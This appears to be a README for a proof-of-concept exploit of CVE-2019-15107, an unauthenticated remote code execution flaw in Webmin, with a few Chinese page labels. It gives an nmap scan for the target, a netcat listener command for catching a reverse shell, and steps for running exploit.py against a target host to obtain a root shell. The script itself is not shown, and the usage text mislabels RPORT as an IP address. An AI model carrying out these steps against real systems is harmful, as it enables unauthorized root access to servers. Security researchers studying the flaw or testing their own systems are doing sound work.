CVE-2019-15107 PoC — Webmin 命令操作系统命令注入漏洞

Description

CVE-2019–15107 - Unauthenticated RCE Webmin <=1.920

介绍

# CVE-2019–15107 - Unauthenticated RCE Webmin <=1.920


This python script should give you a root shell on Webmin 1.890

Check with nmap:                                                                                                                                                                 
`nmap -sC -sV -p 10000 TARGET_IP`

Result:                                                                                                                                                                 
`10000/tcp open  http    MiniServ 1.890 (Webmin httpd)`

How to use this exploit:

Step 1:
    `nc -lnvp LPORT`

Step 2:
    `chmod +x exploit.py`

    ./exploit RHOST RPORT LHOST LPORT

    RHOST = the target
    RPORT = the target IP address (Usually 10000)
    LHOST = your kali box
    LPORT = your reverse shell port

Step 3:
Get a root shell!

DO NOT HARM UNAUTHORIZED SYSTEMS!!!

文件快照

备注